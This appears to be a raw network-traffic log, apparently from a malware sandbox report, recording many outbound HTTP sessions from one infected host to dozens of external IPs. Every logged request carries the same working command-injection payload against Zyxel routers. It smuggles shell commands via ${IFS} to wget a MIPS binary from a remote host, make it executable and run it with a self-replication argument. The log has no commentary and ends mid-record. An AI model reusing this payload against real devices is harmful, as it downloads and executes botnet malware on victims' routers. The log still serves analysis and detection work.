                                      Jan 19, 2024 17:29:46.052834988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7786192.168.2.1451500222.177.144.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.052870035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7787192.168.2.1450350125.56.59.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.052931070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7788192.168.2.1454118160.181.211.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.052961111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7789192.168.2.1437898193.97.241.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053003073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7790192.168.2.1454420179.222.116.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053040028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7791192.168.2.1447456194.133.47.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053087950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7792192.168.2.145263645.123.21.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053112030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7793192.168.2.1442772138.14.150.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053164005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7794192.168.2.144775081.143.194.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053214073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7795192.168.2.1449138103.136.147.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053239107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7796192.168.2.145202476.235.15.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053282976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7797192.168.2.1447960148.18.58.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053337097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7798192.168.2.143478848.46.233.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053359032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7799192.168.2.1447234177.204.230.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053400040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7800192.168.2.1443448119.226.188.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053445101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7801192.168.2.1451850207.100.178.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053498030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7802192.168.2.14419544.115.208.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053514004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7803192.168.2.1434028112.25.157.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053565025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7804192.168.2.1436374191.3.205.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053617954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7805192.168.2.14557402.120.224.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053658962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7806192.168.2.144039260.11.76.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053710938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7807192.168.2.143608064.144.225.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053774118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7808192.168.2.1455554159.26.219.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053802013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7809192.168.2.144089286.163.233.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053802967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7810192.168.2.1433046220.5.188.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053802967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7811192.168.2.1437780197.131.71.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053838015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7812192.168.2.14560761.153.140.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053901911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7813192.168.2.143648460.203.13.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.053904057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7814192.168.2.144077268.34.235.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054008961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7815192.168.2.1433990142.201.9.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054017067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7816192.168.2.1434960121.5.240.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054043055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7817192.168.2.1440822204.141.233.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054095030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7818192.168.2.1438852174.119.204.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054131985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7819192.168.2.14431585.29.48.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054188967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7820192.168.2.1433284151.51.98.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054244995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7821192.168.2.1458750212.167.198.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054297924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7822192.168.2.1451838170.25.8.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054306030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7823192.168.2.1459632155.210.64.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054368973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7824192.168.2.14542585.110.61.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054410934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7825192.168.2.1460628191.202.2.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054454088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7826192.168.2.145907225.43.101.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054481030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7827192.168.2.1433124223.161.172.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054544926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7828192.168.2.1447004152.139.48.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054569006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7829192.168.2.1442834223.253.139.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054616928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7830192.168.2.1443640140.47.76.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054666996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7831192.168.2.144477863.239.193.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054702044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7832192.168.2.146014031.221.227.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054769039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7833192.168.2.1438492134.18.233.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054805040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7834192.168.2.1433148142.93.202.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054858923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7835192.168.2.1446516179.97.34.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054888964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7836192.168.2.1457056131.38.154.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054914951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7837192.168.2.1457634135.8.139.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054979086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7838192.168.2.1440282154.143.9.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.054999113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7839192.168.2.145745087.180.89.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.055052042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7840192.168.2.145586865.7.25.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.055073977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7841192.168.2.1449236168.65.49.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.055125952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7842192.168.2.143727477.95.160.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.055167913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7843192.168.2.144756297.209.121.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.055212975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7844192.168.2.1451944141.162.122.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.055257082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7845192.168.2.145497214.123.102.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.055263996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7846192.168.2.143865877.97.86.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.055310965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7847192.168.2.1447916118.216.217.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.055345058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7848192.168.2.144097468.162.168.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.055401087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7849192.168.2.145303817.30.228.65443
                                      TimestampBytes transferredDirectionData
